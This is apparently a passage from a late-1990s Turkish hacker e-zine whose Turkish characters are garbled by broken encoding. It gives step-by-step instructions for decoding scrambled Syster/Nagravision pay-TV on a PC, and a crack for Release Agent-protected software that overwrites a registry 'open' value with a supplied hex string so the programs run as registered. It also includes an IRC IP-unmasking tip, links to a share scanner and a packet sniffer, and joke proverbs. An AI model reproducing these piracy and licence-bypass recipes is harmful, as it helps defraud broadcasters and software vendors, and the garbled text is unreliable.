a tyklayyn wave i sonuna kadar a�yn. Daha sonra da Se�enekler>�zellikler>Kayyt Y�in
de sadece Line-in in yany i?aretli kalsyn , di?erleri bo?.
Tamam a basty?ynyzda kar?ynyza Kayyt i�i ses ayarlary gelir. Sadece Line-in
g�r�necektir ve altyndali Se� kutusu i?aretli olacaktyr. Line-in i sonuna kadar a�yp
menuden �ykyn.
5. Makinenizi bir resetleyip TV programynyzy �aly?tyryp bir kanala ayarlayyn. Daha
sonra Syster ile gelen BtDiag programyny �aly?tyryp Refresh tu?una basyn. GPIoData ve
GPIoEnable de?erlerini bir kenara not edin.
Buraya kadarki adymlar programdan ba?ymsyz idi gelelim tek tek programlaryn nasyl
kullanylaca?yna.
2.1 Syster 4.6
1. TV programynyzla seyretmek istedi?iniz kanaly ayarlayyn ve TV programynyzy
kapatyn.
2. Hoperlor simgesine �ift tyklayyp gelen menude Line-in i sessiz hale getirin.
3. Syster4.exe yi �aly?tyryn.
Video Mode: Ekran kartynyz 15 bit mi 16 bit mi?
�rne?in S3 V+ , S3 V2 16 bit ; S3 Virge , nVidia Riva vs. 15 bitlik kartlardyr. Yanly?
se�im yaparsanyz renkler ye?il ye?il olur o kadar.
Input : Tuner de kalsyn. Composit i�in yanynda gelen readme yi okuyun.
On Startup : Keyfinize g�re takylyn. Hadi decode ta kalsyn
TV Card : TV kartynyzyn markasyny se�in. Burasy ses decoding i ile ilgili bir se�enek.
Elinizdeki kart burada g�r�nm�yor ise a?a?yda 8. maddede ne yapmanyz gerekti?i
mevcut.
Key File : Key.txt
Keyline : 100-150 arasy iyi
Number of Keys : 8 optimum bir sayy
Decode Audio : Tabiki on ve OK tu?una basyn. Kar?ynyza mekinenizi resetlemenizi
s�yleyen bir mesaj my geldi ? Dedi?ini yapyn ve Syster i tekrar �aly?tyryn. PubS "Kein
Specier" gibi bir ?eyler s�ylerse de yine makinenizi resetlemeniz gerekiyor demektir.
4. Makinenizi resetlediniz Syser i �aly?tyrdynyz ama kar?ynyza pembe bir ekran geldi.
Syster den �ykyp TV programynyza bir girip ilgili kanaly ayarlayyn ve �ykyn. Sonra
Syster i tekrar ba?latyn.
5. Syster �aly?ty hepsi tamam da renk mi yok ? Numpad deki 0 tu?una renk gelene
kadar basyn.
6. Gelelim HotKey lere
F1. Programy ba?latyr
F2. Programy durdurur
F3. FPS (frame per second) sayacyny syfyrlar.
F4. Tam ��z�n�rl�k / D�?�k ��z�n�rl�k arasy ge�i?
F5. Freeze
F6. Status Line on/off
F8. Decoding on/off
Numpad 0 . Faz ayary , renkleri oturtmak i�in
Numpad 4/5. Parlaklyk a�/kapa
Numpad 7 . Key sayysyny de?i?tirir. Pek oynamayyn.
7. F6 ile status line y a�yp F3 e basarak sayacy bir syfyrlayyn. Sa? altta programyn fps
olarak hyzy belirir. Maksimum 50 fps yapabilirsiniz. E?er hyz 30 fps in altynda ise
makinenizin g�c� hem sesi hemde g�r�nt�y� ayny anda decode etmeye yetmiyor
demektir. Hareketler yava?lar falan. O zaman F4 e basyp ��z�n�rl�?� d�?�r�n.D�?�k
��z�n�rl�kte maksimum hyz 25 fps olabilir. Veya audio decoding se�ene?ini off se�in.
Hyzynyz artacaktyr. Ya sessiz seyredeceksiniz veya ses i�in dedi?im gibi basit bir
elektronik devre kullanacaksynyz. Devre kullanyyorsanyz , line-in i sessiz hale
getirmeyin ve Syster i audio decoding off olarak �aly?tyryn.
8. TV kartynyzyn markasy listede yok ne yapacaksynyz ? Yki se�enek var :
a) TV Card olarak "User Defined ....." se�in ve alt kysma da daha �nce BtDiag ile
buldu?unuz GpIoData de?erini yazyn. Sonra da Syster i �aly?tyryn. Yine mi ses yok?
b) O zaman "Unknown(Use TV....)" se�in. �nce Syster i ba?latyn sonra F2 ile durdurup
Alt-Tab ile ge�i? yapyn. Normal TV programynyzy �aly?tyryn. Yine Line-in i sessiz hale
getirip Syster e ge�in ve F1 ile programy ba?latyn. Syster 4.0 da da bu metod
kullanylyrdy.
2.2 PubS
Abi yok b�le bir ?ey. G�r�nt� kalitesi acayip. Bir de sesi olsa. Neyse gelelim nasyl
kullanylyra.Aslynda bu programyn kanal ayary falan da var ama kafanyzy
kary?tyrmayym , en iyisi en basit kullanymdyr
1. �ncelikler paketin i�inde gelen Gencrc2.exe yi �aly?tyryn. Sabredin epey bir s�re
�aly?yp crcA.bin diye 26MB lyk bir dosya olu?turacak.
2. Daha sonra ne olur ne olmaz makinenizi bir resetleyin. �nce TV programynyzy sonra
da kurukafa ikonlu dekpatch yn 2.0 versiyonunu �aly?tyryn.
3. Karte kysmynda �� ayar var :
i)TV kartynyzdaki Tuner Phlips mi ? Temic mi? Bunu elle girmeniz lazym.
ii)Kart Bt848 li mi , Bt878 li mi ? Auto �aly?yyor
iii)Y?letim sistemi , onu da otomatik anlayabiliyor.
Video Kysmynda ekran kartynyzyn 15 bit mi 16 bit mi oldu?unu girin , parlaklyk ,
kontrast ve renk ayarlaryny yapyn , kalan kysymlara dokunmayyn. Audio kysmynda
yanly? yaparsanyz ses elde edemezsiniz. Uber decoder / Uber Software bana ikisi de
ayny geldi , ama bu program GpIoEnable ve GpIodata de?erlerini kendi otomatik
bulamyyor. y�zden Auto yanyndaki i?areti kaldyryp ilgili yerlere BtDiag ile daha �nce
bulduklarynyzy yazyn ve dosyayy yamayyn.
4. Programmynyz artyk kullanyma hazyr. Normal TV programynyzla ilgi kanala
ayarlayyp �ykyn. Daha sonra Line-in i sessiz hale getirin. Ses decoder programynyzy
�aly?tyryn. En son olarak ta Dek.Bat dosyasyny �aly?tyryn. Dek abuk bir mesaj verip
�aly?mazsa makinenizi resetleyip programy tekrar ba?latyn.
5. PubS yn HotKey leri neler ?
'X' color decoding needs mmx
'C' color decoding no mmx
'M' b/w decoding no mmx
'T' Testmode????
'A' enable autodetect of coded / uncoded broadcasts - �aly?ty?yny g�rmedim -
'E' decoding on/off (autodetect will be disabled)
'R' reads a raw screendump for testing purpose
'W' dumps a raw screendump for testing purpose
'+' and '-' Channel tuning - kurcalamayyn ! -
'S' freeze picture / unfreeze
'N' new picture in freeze mode
'V' enable/disable debug stuff
'K' dumps a clock value on console for every frame (???)
ESC Quit program
Ingilizce ama herkes anlar herhalde. Yine de �nemli olanlary E ?ifre ��zmeyi a�yp
kapatyyor , ESC ile de programdan �ykyyorsunuz. X e basarsanyz renk i�in MMX kodlary
kullanyyor C ' ye basarsanyz normal kodlary. Deneyin hakikaten fark ediyor.
2.3 Ses Decodarlary
Dedi?im gibi Syster hari� di?er programlar i�in ayry bir ses decoder programy kullanmak
gerekiyor. Bu programlar �ok akrma?yk ?eyler de?il , burnunuzun dikine giderek
kullnabilirsiniz. Cpluswin , Nscodec veya NGSound deneyin be?endi?inizi kullanyn. �ok
yava?latyyorlarsa donanym yoluyla sesi decode edebilirsiniz. Haftaya bir PCB yapyp ben
de bu y�ntemi deneyece?im.
3.Sonu� ve Genel De?erlendirme
�zellikle PubS + NSCodec �ok iyi sonu� veriyor. Ancak NsCodec sistemi �ok
yava?latty?yndan sisteminiz kaldyrmyyoorsa ses kalitesi daha k�t� de olsa di?er
programlary kullanabilirsiniz.
Syster 4.6 makul bir performans ve kullanym kolayly?yna sahip. Ama renkler PubS
kadar iyi de?il. Belki en ba?ynda bahsetmek lazymdy ama , bu i?in uzmany olmasam da
, kysaca bu i? nasyl yapylyyor onu da belirteyim. Sesten ba?layalym. Sesi kodlamak i�in
normal i?areti 12.8KHz lik bir sinus ile module ediyorlar. Daha sonra da �st yan bandy
filtreliyorlar. B�ylece frekans spektrumu invert edilmi? oluyor. Decode etmek i�in gelen
sesi yine 12.8KHz ile �arpyp al�ak ge�iren bir filtreden ge�irmek lazym. �arpym sonrasy
?ifreli ve ?ifresiz ses �st �ste binmi? olarak elde ediliyor. NSCodec hari� di?er
programlaryn hi�birince al�ak ge�iren filtre yok veya var da adam gibi de?il. Bunun
etkisini yslyk gibi sesler ve distorsiyon ?eklinde farkedebilirsiniz. Filtreleme de i?lemciye
�ok y�k bindiriyor. Insan kula?y belli bir frekansyn �st�n� duymady?y i�in filtresiz de
olsa ses idare ediyor.
G�r�nt�ye gelince , PAL TV g�r�nt�s� 625 satyrdan olu?uyor. Senkronizasyon falan 580
kadary g�r�nen resimler i�in kullanylyyor. Syster-Nagravision kodlama sisteminde gelen
satyrlar belli bir konfsiyona ba?ly olarak 32 satyrlyk bir bufferyn belli bir syrasyna
aktarylyyor , o syradaki satyr da �yky?a veriliyor. Bu i? i�in kullanylan i� i�e iki fonksiyon
var. S fonksiyonu pek syk de?i?miyor ve Key.Txt dosyalaryndaki fonksiyon bu. Ykincisi
ise zamana ba?ly olarak de?i?en iki parametre. Bunlar bilinmiyor ama tahmin ediliyor.
Nasyl my? Satyrlaryn benzerli?inden. Altalta gelen satyrlaryn parlakly?y rangi falan
benzerdir. Program ufak bir deneme yapyp bu iki parametreyi belirliyor sonra b�t�n
resmi ��z�yor.
Pekala bu kadar laf salatasynyn sonucu ne ?
1. E?er g�r�nt� birbirine benzer kesimlerden olu?uyorsa ( �rne?in ma�larda uzak
�ekimlerde ekranyn �o?u birbirine benzer ye?il alanlar ) her yer birbirine benzedi?inden
program yanly? tahminde bulunuyor ve g�r�nt� gidip geliyor. Bu normaldir tela?a gerek
yok.
2. Hyz ve programlama zorlu?u a�ysydan ses programlarynda al�ak ge�iren filtre
konmamy?sa ses kalitesinde normal olrak biraz d�?me olacaktyr.
Benden bu kadar , hepinize iyi seyirler :-)
6- Release Agent Software Cracking (D�zenleyen Mr_Stop)
�ns�z:Release software tarafindan korunan programlar g�n�m�zde �ok yaygn olarak
etrafta bulunmaktadyr.Symantec, Macromedia, Xing ve daha bir s�r� b�y�k ?irket bu
koruma ?emasyny kullanmaktadyr.Ben bu yazymda bu korumanyn bir backdoor yani bir
arka kapysyndan sizlere bahsedecegim.Bu arka kapyyy tamamiyle ben buldum ve
kyrdym dersem yalan olur.Bu konuda crack konusunda deneyimli yabancy bir cracker
dan yardym aldym..(�grenmesi �ok zor oldu herifle tanysyncaya dek neyse deydi
ama).Ilk basta Rsagent(Release Agent software) korumasy hakkynda birka� bilgi
verelim.Bu tip programlar genelde s�yle bir ekran �ykartyrlar.Bu resimde gibi resim
g�rd�g�n�zde bu bizim konu ettigimiz koruma t�r�ne giriyo bir de s�yle bir ekran da
g�rebilirsiniz.Bu programlar ise bu kadar kolay kyrylmaz.Bunlara daha ileri teknikler
uygulamamyz gerekmektedir.Bizim su andaki konumuz RsAgent Try and Buy tipi
programlar.Eger Norton Utilities veya buna benzer bir Rsagent programy kurmus iseniz
sizde s�yle bir seyin farkyna varmyssynyzdyr.Eger program byr kere kayytlanmyssa ne
kadar yenyden y�klersek y�kleyelim hep su ekrany g�r�rr�z.Iste benim Rsagent kyrma
olayym bunun neden oldugu �zerinedir.Eger hazyrsanyz �ok kolay bir sekilde RsAgent
ile korunan bir programy kyralym
Gerekli Malzemeler:Xing Mpeg Encoder 2.x,Herhangi bir Text Edit�r�.(Notepad,veya
benim kullandygym Ultra Edit5 ) ve bir beyin sanyrym sonuncusu herkeste var :)
Programyn Kyrylmasy:Ben bu backdooru s�yle buldum.Bir kere program register
edildiginde program hep registered olarak a�ylyyodu o zaman programyn a�ylyrken
kayytly olup olmadygyny kontrol i�in bir dosyaya veya bir registry anahtaryna
baktygyny varsaydym ve arastyrmaya basladym.Dosya ve registryde neler oldugunu
denetleyen Win expose registry ve win expose file access diye iki programy
kurdum.Sonra programlaryn sadece Rsagent ile korunan programa bakmasy i�in altta
isleyen b�t�n programlary kapattim.Xing Mpeg Encoder a�ylyrken tabiki bir suru
dosyaya ve registry keye bakttygyny g�rd�m.Bunlary dikkatli bir sekilde inceledikten
sonra garip bir registry keyi ile karsylastym HKEY_CLASSES_ROOT\ultxfile bu key
benim dikkati mi �ekti.Bu keyi ilk basta yedekleyip;keyi silerek progarmy
�alystyrdym.Program s�yle bir ekran g�sterip beni uyardy ve a�ylmyyacagyny
s�yledi.BINGO aradygym sey iste bu idi.Ben de artik Xingmpeg Encoder y kayytlamak
i�in hep ayny dosyayy registry e ekledim ve �ok basit bir sekilde ugrasmadan programy
kayytladim.EVET simdi hazyr olun,simdi olayyn en can alycy nokatasyna geldik,bu
ultxfile altindaki keylerin isimleri her program i�in farkly olsada i�lerindeki datalar
AYNI!!!!.Yani Rsagent ile bir kere bir program kyrarsanyz(Zor methodu da sonra
yazycam).Gerisi �orap s�k�g� gibi gelicektir.Ben size bu data dosyasynyn formatyny
vereyim.Dedygym gibi is registry de sakli.HKEY_CLASSES_ROOT\ultxfile\Format\
dizinin altynda degisik girdiler g�receksiniz.Bizi bunlardan open keyi ilgilendiriyo.O
keyi su sekilde deigtirirseniz
"open"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,10,00,08,08,00,00,10,00,\
00,00,00,00,00,00,00,00,00,00
O program herzaman kayytly a�ylyr yani yapacagynyz sey �ok basit
HKEY_CLASSES_ROOT\ultxfile\Format\ altindaki butun anahtarlaryn open degerlerini
yukarydaky degerle degystireceksiniz.Ben �rnek olmasy a�ysyndan bir tane registry
dosyasini ekledim bu dosyayy inceleyin.�rnek registry dosyasy
Sonu�:RsAgent korumasy su andaki en zayyf korumalardan birisidir.Eger
HKEY_CLASSES_ROOT\ultxfile\Format\ altindaki butun anahtarlaryn open degerlerini
dedigim gibi degistirirsek program hic bir crack serial veya baska ugraslara gerek
kalmadan kirylacaktyr.
Not:Eger birisi bana bir windows programcygy yazarsa l�tfen bana ulassyn.Programyn
tek yapmasi gereken sey HKEY_CLASSES_ROOT\ultxfile\Format\ altindai keyleri bulmak
ve bir butona bastygymyzda o keylerdeki open degerlerini
"open"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,10,00,08,08,00,00,10,00,\
00,00,00,00,00,00,00,00,00,00 degeri ile degi?tirecek.Eger birisi bunu yapmaya karar
verirse l�fen bana mail atsyn.O kisi ile daha ayrintyly konusalym.
Ilk defa b�yle bi sey yaziyorum insallah anlamyssynyzdir.Eger bu konuda takylan olursa
bana yine mail atabilir.Fakat l�tfen crack nereden bulunur sunu nasyl kyraryz gibi
sorular sormayyn sadece bu konudaky sorularynyzy bekliyorum..
7- Ayyn Tipi (D�zenleyen Projman)
IRC'de IP spoof yaparak millete saldyranlaryn sayysy artyyor. Kullanycynyn IP'sine
bakty?ynyzda manasyz bilgiler g�r�yorsunuz. Peki kullanycynyn ger�ek IP'si nasyl
alynyr?
1- �ncelikle muhatabymyzy bir �?renelim. /whois JP Whois'e gelen cevap
[email protected]
2- /dns this.is.a.spoofed.adres.com komutuna cevap olarak hostmask does not
resolve mesajy alyyorsak muhatabymyz ger�ekten IP Spoof yapyyor demektir.
3- /quote UserIP JP komutuyla kar?ymyza ne �ykyyor :) [email protected] Y?te
bu ger�ek IP Adresi. (130.49.71.21)
* Herhangi bir kullanycyn hangi internet servis sa?layycydan ba?ly oldu?unu anlamak
i�in www.ripe.net in whois database'ini kullanyn. IP adresini verdi?inizde o IP'nin hangi
Servis Sa?layycyya ya da kuruma ait oldu?unu g�receksiniz.
* Siz internetteyken neler d�n�yor? Kimlerle ba?lanty kurmu?ssunuz anlamak i�in
MSDos Komut Ystemine ge�ip "netstat -A" komutunun kullanyn..
8- Ayyn Programlary (D�zenleyen Intruder)
a- http://rhino9.ml.org/software/legion2.htm 'de bulunan Legion2.1
eski version'a g�re mukemmel share halindeki makina tarayycysy.yakaladyklary i�in
kendi makinanizda Map ederek ilave drive(orne?in G:,J:,K: vs vs) olarak
g�rebiliyorsunuz.Tabi tam lamer'lara gore de e?lenceli napiim eheh
b- Linux'cular icin http://sniffit.rug.ac.be/sniffit/sniffit.html burdaki Sniffit v. 0.3.7.beta
gelen(ozellikle bu) ve/veya giden paketler i�in �ok iyi bir g�r�nt�leyici bu programy
soylememin nedeni, e-mailde ya da IRC'de attack detect sorularyny sykca soranlar
i�indi.
(Not: Bu aydan itibaren programlary paketlerin i�ine yerle?tirmeyece?iz. �ok fazla
?i?kinli?e neden oluyor, verilen linkler programlary �ekebilirsiniz)
9- Geyik (D�zenleyen Tascam)
Kedi kullanamady?y programa, vir�sl� der.
Bugsyz program olmaz.
Acele programa bug kary?yr.
Do?ru program debug istemez.
Al programyn orjinalini, �ekme kaygysyny.
?ifreni s�yleme dostuna, o da s�yler dostuna.
Hack'e giden hacklenir.
Bo gelecek yerden netbus esirgenmez
Vakitsiz kilitlenen bilgisayar resetlenir.
Doom oynayany 9 labtan kovarlar.
Ayny memory adresinde iki de?isken �tmez.
Baskyn basanyn, memory allacote edenindir.
Bir PC'nin nesi, iki PC'nin network'u var.
Tu?a basmakla klavye eskimez.
Ummady?yn program, makineyi kilitler.
Fazla utility, g�z �ykarmaz.
Vir�s�n� s�ylemeyen anti-vir�s�n� bulamaz.
Vir�s demekle, vir�s bula?maz.
Virus : Ben programy uzantysyndan tanyrym.
��mezin assembly kodu kendini vir�s sanar.
Yi?idin maly ANONYMOUS FTP'dedir.